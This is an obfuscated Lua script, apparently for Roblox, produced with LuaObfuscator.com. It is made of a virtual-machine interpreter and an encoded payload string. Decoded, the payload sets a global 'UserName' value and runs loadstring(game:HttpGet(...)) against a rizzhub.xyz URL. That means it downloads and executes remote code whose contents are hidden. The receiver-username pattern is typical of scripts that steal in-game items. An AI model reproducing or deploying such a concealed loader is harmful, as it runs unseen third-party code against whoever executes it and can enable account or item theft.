--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.6) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v67=v2(v0(v30,16));if v19 then local v74=0;local v75;while true do if (v74==1) then return v75;end if (v74==0) then v75=v5(v67,v19);v19=nil;v74=1;end end else return v67;end end end);local function v20(v31,v32,v33)if v33 then local v68=(v31/((2 + 0)^(v32-(2 -1))))%((1 + 1)^(((v33-(638 -(510 + 127))) -(v32-1)) + (2 -1))) ;return v68-(v68%(3 -2)) ;else local v69=1001 -(601 + (540 -(18 + 122))) ;local v70;while true do if (v69==(0 -0)) then v70=(1 + 1)^(v32-(3 -2)) ;return (((v31%(v70 + v70))>=v70) and (1031 -(639 + 355 + 36))) or (0 -0) ;end end end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35=0 + 0 ;local v36;local v37;while true do if (v35==((0 -0) -0)) then v36,v37=v1(v16,v18,v18 + 1 + 1 );v18=v18 + (4 -2) ;v35=1807 -(1172 + 634) ;end if (v35==1) then return (v37 * (2201 -(146 + 1799))) + v36 ;end end end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + 3 );v18=v18 + (12 -8) ;return (v41 * (16778835 -(693 + 926))) + (v40 * (41090 + 24446)) + (v39 * (319 -(21 + 42))) + v38 ;end local function v24()local v42=v23();local v43=v23();local v44=1062 -(933 + 128) ;local v45=(v20(v43,1 -0 ,(47 + 10) -37 ) * ((7 -5)^(78 -46))) + v42 ;local v46=v20(v43,21,1570 -(1379 + 160) );local v47=((v20(v43,3 + (133 -104) )==(1 + 0)) and  -(1 -0)) or (1 + 0) ;if (v46==(0 -0)) then if (v45==(0 + 0)) then return v47 * (327 -((488 -184) + 23)) ;else v46=2 -1 ;v44=49 -(44 + 5) ;end elseif (v46==(7802 -(26133 -20378))) then return ((v45==(1511 -(1078 + 433))) and (v47 * ((1 -0)/(0 -(0 -0))))) or (v47 * NaN) ;end return v8(v47,v46-((6360 -4198) -1139) ) * (v44 + (v45/(((16 -10) -4)^(17 + 35)))) ;end local function v25(v48)local v49=1464 -(889 + 575) ;local v50;local v51;while true do if (v49==(930 -(210 + 720))) then v50=nil;if  not v48 then local v83=1702 -(788 + 914) ;while true do if (v83==(0 -0)) then v48=v23();if (v48==(0 -0)) then return "";end break;end end end v49=1;end if ((1 + 0)==v49) then v50=v3(v16,v18,(v18 + v48) -(697 -(336 + 360)) );v18=v18 + v48 ;v49=1015 -(685 + (521 -193)) ;end if ((4 -1)==v49) then return v6(v51);end if (v49==((1821 -(547 + 1270)) -2)) then v51={};for v76=1, #v50 do v51[v76]=v2(v1(v3(v50,v76,v76)));end v49=267 -(182 + 82) ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=64 -(8 + 56) ;local v53;local v54;local v55;local v56;local v57;local v58;while true do local v66=0 + 0 ;while true do if (v66~=(1 -0)) then else if (v52~=1) then else local v94=1527 -(1082 + 445) ;while true do if (v94~=(1 -0)) then else local v107=0 + 0 ;while true do if (1==v107) then v94=561 -(51 + 508) ;break;end if (v107~=(0 -0)) then else for v119=2 -1 ,v57 do local v120=0;local v121;local v122;local v123;local v124;while true do if (v120~=(2 -0)) then else while true do if (v121~=1) then else v124=nil;while true do if (v122==(1 + 0)) then if (v123==(1 + 0)) then v124=v21()~=(492 -(250 + 242)) ;elseif (v123==(617 -(223 + 392))) then v124=v24();elseif (v123~=(1297 -(1095 + 199))) then else v124=v25();end v58[v119]=v124;break;end if (v122~=(0 -0)) then else local v160=0 + 0 ;local v161;while true do if (v160~=0) then else v161=0;while true do if (v161~=(2 -1)) then else v122=1 + 0 ;break;end if (v161~=(0 + 0)) then else local v187=0 + 0 ;local v188;while true do if (v187~=(0 + 0)) then else v188=0;while true do if (v188==(3 -2)) then v161=3 -2 ;break;end if (v188==(0 + 0)) then local v196=1472 -(237 + 1235) ;while true do if (v196~=(0 -0)) then else v123=v21();v124=nil;v196=1910 -(314 + 1595) ;end if ((1 + 0)~=v196) then else v188=1841 -(1166 + 674) ;break;end end end end break;end end end end break;end end end end break;end if (v121~=0) then else local v143=0;local v144;while true do if (v143~=(0 -0)) then else v144=0 -0 ;while true do if (v144==(0 -0)) then v122=1198 -(422 + 776) ;v123=nil;v144=1 -0 ;end if (v144==(1 + 0)) then v121=1;break;end end break;end end end end break;end if (v120~=(4 -3)) then else v123=nil;v124=nil;v120=1 + 1 ;end if (v120~=(0 + 0)) then else v121=0 -0 ;v122=nil;v120=1 + 0 ;end end end v56[12 -9 ]=v21();v107=1;end end end if (v94==(9 -7)) then v52=3 -1 ;break;end if (v94~=0) then else local v108=0 -0 ;while true do if (v108~=(0 + 0)) then else v57=v23();v58={};v108=1 + 0 ;end if ((1 + 0)==v108) then v94=1391 -(891 + 499) ;break;end end end end end break;end if (v66==(423 -(313 + 110))) then if (v52~=(952 -(445 + 505))) then else local v95=0 + 0 ;while true do if (v95~=(0 + 0)) then else for v109=2 -1 ,v23() do local v110=0;local v111;local v112;while true do if ((934 -(758 + 175))~=v110) then else while true do if (v111==(0 -0)) then v112=v21();if (v20(v112,1 + 0 ,1)~=(0 -0)) then else local v127=1249 -(626 + 623) ;local v128;local v129;local v130;local v131;local v132;while true do if (v127==2) then v132=nil;while true do if (v128~=(1105 -(415 + 689))) then else local v166=1244 -(17 + 1227) ;local v167;while true do if (v166==(1931 -(518 + 1413))) then v167=1480 -(316 + 1164) ;while true do if (v167~=(601 -(95 + 505))) then else v128=1 + 1 ;break;end if (v167==(0 + 0)) then local v193=979 -(489 + 490) ;while true do if ((4 -3)~=v193) then else v167=2 -1 ;break;end if (v193==(0 -0)) then v131=nil;v132=nil;v193=1;end end end end break;end end end if (v128~=(2 + 0)) then else while true do if (v129~=(1 + 1)) then else local v176=0 + 0 ;local v177;while true do if (v176~=(0 + 0)) then else v177=0 -0 ;while true do if (v177~=(238 -(88 + 149))) then else v129=3 -0 ;break;end if (v177==0) then local v194=0;while true do if ((1 -0)==v194) then v177=18 -(15 + 2) ;break;end if (0~=v194) then else local v197=0 -0 ;while true do if (v197==1) then v194=1 + 0 ;break;end if (v197==0) then if (v20(v131,1 + 0 ,1 -0 )==(1 + 0)) then v132[2]=v58[v132[1 + 1 ]];end if (v20(v131,2 + 0 ,1 + 1 )~=(1 + 0)) then else v132[733 -(685 + 45) ]=v58[v132[9 -6 ]];end v197=1;end end end end end end break;end end end if (3~=v129) then else if (v20(v131,3,11 -8 )==1) then v132[1415 -(129 + 1282) ]=v58[v132[4]];end v53[v109]=v132;break;end if (v129==(38 -(20 + 17))) then local v179=0;local v180;local v181;while true do if (v179~=0) then else v180=0 -0 ;v181=nil;v179=536 -(388 + 147) ;end if ((4 -3)~=v179) then else while true do if (v180==(822 -(459 + 363))) then v181=0 -0 ;while true do if (v181==1) then v129=2 + 0 ;break;end if (v181~=(1808 -(1403 + 405))) then else local v198=0;local v199;while true do if (v198~=(0 -0)) then else v199=0 + 0 ;while true do if (v199==(1 -0)) then v181=647 -(546 + 100) ;break;end if (v199~=0) then else v132={v22(),v22(),nil,nil};if (v130==0) then local v204=1771 -(1603 + 168) ;local v205;local v206;local v207;while true do if (v204==(0 -0)) then v205=0 + 0 ;v206=nil;v204=1 -0 ;end if (v204~=(1 + 0)) then else v207=nil;while true do if (v205==1) then while true do if (v206==(0 + 0)) then v207=0;while true do if (v207==(1910 -(310 + 1600))) then v132[3]=v22();v132[4]=v22();break;end end break;end end break;end if (v205==(0 + 0)) then local v210=0;while true do if (v210~=0) then else v206=0 + 0 ;v207=nil;v210=853 -(643 + 209) ;end if (v210==(1773 -(248 + 1524))) then v205=1 + 0 ;break;end end end end break;end end elseif (v130==(928 -(215 + 712))) then v132[1967 -(1187 + 777) ]=v23();elseif (v130==(765 -(695 + 68))) then v132[3]=v23() -((2 + 0)^(16 + 0)) ;elseif (v130==(1065 -(952 + 110))) then local v211=0 + 0 ;local v212;local v213;while true do if ((0 -0)~=v211) then else v212=475 -(467 + 8) ;v213=nil;v211=2 -1 ;end if (v211==(2 -1)) then while true do if (v212~=(0 + 0)) then else v213=0 -0 ;while true do if (v213~=(0 + 0)) then else v132[3]=v23() -(2^(12 + 4)) ;v132[4]=v22();break;end end break;end end break;end end end v199=2 -1 ;end end break;end end end end break;end end break;end end end if (v129~=(660 -(555 + 105))) then else local v182=0;local v183;while true do if (v182==(909 -(338 + 571))) then v183=1439 -(764 + 675) ;while true do if (v183~=(1628 -(1268 + 359))) then else v129=553 -(372 + 180) ;break;end if (v183==0) then local v195=0 -0 ;while true do if (v195==(1325 -(640 + 685))) then v130=v20(v112,6 -4 ,568 -(147 + 418) );v131=v20(v112,2 + 2 ,6);v195=1637 -(1598 + 38) ;end if (v195==1) then v183=2 -1 ;break;end end end end break;end end end end break;end if (v128==(0 -0)) then local v168=0 -0 ;while true do if (v168~=1) then else v128=1 -0 ;break;end if (v168~=(0 -0)) then else local v184=0 -0 ;while true do if (v184~=(0 -0)) then else v129=416 -(287 + 129) ;v130=nil;v184=1 + 0 ;end if (v184~=1) then else v168=1;break;end end end end end end break;end if (v127~=(1 -0)) then else v130=nil;v131=nil;v127=2;end if (v127~=0) then else v128=0;v129=nil;v127=1 + 0 ;end end end break;end end break;end if (v110==(0 -0)) then v111=0;v112=nil;v110=2 -1 ;end end end for v113=1 + 0 ,v23() do v54[v113-(2 -1) ]=v28();end v95=1;end if (v95==(3 -2)) then for v115=1 -0 ,v23() do v55[v115]=v23();end return v56;end end end if (v52~=0) then else local v96=0;local v97;while true do if (v96==(0 + 0)) then v97=575 -(49 + 526) ;while true do if (v97~=(855 -(532 + 323))) then else v53={};v54={};v97=1 + 0 ;end if (v97==2) then v52=1 -0 ;break;end if (v97~=(1 -0)) then else v55={};v56={v53,v54,nil,v55};v97=4 -2 ;end end break;end end end v66=193 -(19 + 173) ;end end end end local function v29(v59,v60,v61)local v62=0;local v63;local v64;local v65;while true do if (0==v62) then v63=v59[1];v64=v59[2];v62=1;end if (v62==1) then v65=v59[3];return function(...)local v78=1;local v79= -1;local v80={...};local v81=v12("#",...) -1 ;local function v82()local v84=v63;local v85=v64;local v86=v65;local v87=v27;local v88={};local v89={};local v90={};for v98=0 + 0 ,v81 do if (((3025 -(1310 + 104))<((5022 -(215 + 393)) -(1392 + 290))) and (v98>=v86)) then v88[v98-v86 ]=v80[v98 + 1 ];else v90[v98]=v80[v98 + (4 -3) ];end end local v91=(v81-v86) + (1263 -(1037 + 225)) ;local v92;local v93;while true do local v99=0 -(0 + 0) ;local v100;while true do if ((((2054 + 3483) -(47 + 652 + 56))>=(215 + 149)) and (v99==(843 -(782 + 61)))) then v100=1030 -((1212 -(557 + 285)) + 660) ;while true do if ((v100==(1909 -(1345 + 564))) or ((147 + 860)>(1745 + 3052))) then local v118=1065 -(305 + 760) ;while true do if ((v118==0) or ((4422 -2801)<(2446 -1587))) then v92=v84[v78];v93=v92[1077 -((657 -503) + 922) ];v118=289 -(24 + 264) ;end if ((4292>=2025) and (v118==(1 + 0))) then v100=1 + 0 ;break;end end end if ((((7419 -(292 + 161)) -2970)==(3324 + 672)) and (v100==(1 + (0 -0)))) then if ((742<=3917) and (v93<=(2 + 3))) then if ((v93<=(1468 -(467 + 999))) or ((61 + 343)>(1250 + 740 + 166))) then if ((v93<=(539 -(275 + 264))) or (((11430 -7583) -(367 + (2405 -1141)))==(4298 -(206 + 784)))) then v78=v92[3];elseif ((v93==(1 + 0)) or ((723 + 1832)<=(3381 -(60 + 1475)))) then v90[v92[4 -2 ]]=v61[v92[3]];else for v155=v92[2],v92[1660 -((2117 -593) + 133) ] do v90[v155]=nil;end end elseif ((v93<=(1539 -(37 + 1499))) or ((3674 -(985 + 453 + 211))>=((6780 + 1834) -6224))) then local v134=0 -(0 + 0) ;local v135;local v136;local v137;while true do if ((v134==0) or ((4836 -(16 + 49))<(3244 + 197 + 91))) then v135=1790 -(16 + 1774) ;v136=nil;v134=301 -(43 + 257) ;end if ((v134==(1 + (0 -0))) or ((1094 -597)>=(129 + 2204))) then v137=nil;while true do if ((v135==(1 + 0)) or ((1855 -1137)>1783)) then v90[v136 + 1 + 0 ]=v137;v90[v136]=v137[v92[75 -(46 + 25) ]];break;end if (((1430 -604)<=(1951 + 2395)) and (v135==((0 -0) -0))) then local v172=414 -(22 + 392) ;while true do if (((4022 -(119 + 625 + 494))==(9928 -7144)) and (v172==(1619 -(126 + 247 + 1246)))) then v136=v92[2 + 0 ];v137=v90[v92[2 + 1 ]];v172=2 -1 ;end if (((1 + 0)==v172) or ((20 + 564)==((36566 -23076) -(11978 -(739 + 1177))))) then v135=1223 -(251 + 971) ;break;end end end end break;end end elseif ((v93>4) or ((3359 -(268 + 547))>=(54 + 3481))) then v90[v92[47 -((70 -27) + 2) ]]=v92[1 + 2 ]~=0 ;else v90[v92[2]]=v92[7 -4 ];end elseif ((((767 -490) -(8 + 105))==(493 -329)) and (v93<=(8 + 0))) then if ((v93<=(20 -14)) or (2178>=((7402 -(1420 + 377)) -3253))) then do return;end elseif ((v93>((209 -(169 + 16)) -17)) or (4664<(434 + 3652))) then v90[v92[1 + 1 ]]();else local v150=0 + 0 ;local v151;local v152;while true do if (((794 + 3275)>=534) and (v150==(0 + 0))) then v151=97 -(25 + 72) ;v152=nil;v150=2 -1 ;end if (((1 + 0)==v150) or ((5426 -3243)<(1448 + 423))) then while true do if (((5386 -(152 + 1684))>(6033 -2819)) and (v151==0)) then v152=v92[5 -3 ];v90[v152]=v90[v152](v13(v90,v152 + 1 ,v79));break;end end break;end end end elseif (((2982 -(561 + 444))>=(103 + 288 + 295)) and (v93<=(18 -9))) then local v138=1621 -(1545 + 76) ;local v139;local v140;local v141;local v142;while true do if ((v138==(2 + 0)) or ((1186 -691)<397)) then for v162=v139,v79 do local v163=0 -0 ;local v164;while true do if ((v163==0) or ((10273 -6810)<=(5869 -4379))) then v164=0 + 0 ;while true do if ((v164==(906 -(186 + 720))) or ((1979 -(1298 + 569))==(2303 + 1429))) then v142=v142 + (2 -1) ;v90[v162]=v140[v142];break;end end break;end end end break;end if ((v138==(0 -0)) or (452>(244 + 859))) then local v157=0 -0 ;while true do if (((201 + 1722)>=618) and (v157==(2 -1))) then v138=(2 + 0) -1 ;break;end if (((0 + 0)==v157) or ((267 + 85)==((31813 -16525) -10572))) then v139=v92[5 -(748 -(85 + 660)) ];v140,v141=v87(v90[v139](v13(v90,v139 + (1 -0) ,v92[3 -0 ])));v157=51 -(19 + (374 -(53 + 290))) ;end end end if (((585 + 2100)<4644) and (v138==(1 + 0))) then local v158=0 -0 ;while true do if ((0==v158) or (2736==((4335 -(259 + 315)) + 330))) then v79=(v141 + v139) -(1 -0) ;v142=0 -0 ;v158=1;end if ((v158==(1 + 0)) or ((3211 -2348)==4483)) then v138=2 + 0 ;break;end end end end elseif (((3438 -(76 + (1490 -(525 + 755))))>(87 + 1201)) and (v93>10)) then v61[v92[566 -(268 + 295) ]]=v90[v92[2]];elseif (((8042 -5528)==(8458 -5944)) and (v90[v92[1 + 1 + 0 ]]==v92[1466 -(433 + 1029) ])) then v78=v78 + (1687 -(1637 + 49)) + 0 ;else v78=v92[1 + 2 ];end v78=v78 + 1 ;break;end end break;end end end end A,B=v27(v11(v82));if  not A[1] then local v101=0;local v102;while true do if (v101==0) then v102=v59[4][v78] or "?" ;error("Script error at ["   .. v102   .. "]:"   .. A[2] );break;end end else return v13(A,2,B);end end;end end end return v29(v28(),{},v17)(...);end v15("LOL!073O00028O0003083O00557365724E616D6503133O0052616E646F6D696E67536F6D6550656F706C65030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403243O00682O7470733A2O2F72692O7A6875622E78797A2F736372697074732F4D61696E2E6C756100163O0012043O00014O0002000100013O00260A3O00020001000100044O00020001001204000100013O00260A000100050001000100044O00050001001204000200033O00120B000200023O001201000200043O001201000300053O002003000300030006001204000500074O0005000600014O0009000300064O000700023O00022O000800020001000100044O0015000100044O0005000100044O0015000100044O000200012O00063O00017O00163O00023O00033O00053O00053O00063O00083O00083O00093O00093O000A3O000A3O000A3O000A3O000A3O000A3O000A3O000A3O000B3O000C3O000E3O000F3O00113O00",v9(),...);end
